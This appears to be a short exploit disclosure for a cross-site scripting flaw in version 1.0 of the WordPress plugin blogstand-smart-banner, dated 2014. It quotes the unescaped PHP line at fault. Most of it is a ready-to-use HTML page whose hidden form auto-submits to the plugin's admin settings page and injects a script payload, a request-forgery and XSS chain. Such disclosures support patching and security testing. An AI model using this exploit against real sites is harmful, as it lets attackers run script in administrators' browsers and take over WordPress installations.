###################### # Exploit Title : Wordpress blogstand-smart-banner.1.0 Cross Site Scripting # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://wordpress.org/plugins/blogstand-smart-banner/ # Software Link : http://downloads.wordpress.org/plugin/blogstand-smart-banner.1.0.zip # Date : 2014-07-01 # Tested on : Windows 7 / Mozilla Firefox ###################### # Location : http://localhost/wp-admin/options-general.php?page=bs-banner ###################### # Vulnerable code : <td><input type="text" name="<?php echo $blog_id_field; ?>" value="<?php echo $blog_id; ?>" /></td> ###################### Exploit Code: <html> <body> <form name="form1" method="post" action="http://localhost/wp-admin/options-general.php?page=bs-banner"> <input type="hidden" name="blogstand_hidden" value="SET"> <input type="hidden" name="bs_blog_id" value='"/><script>alert(1);</script>'/> <script language="Javascript"> setTimeout('form1.submit()', 1); </script> </form> </body> </html> #####################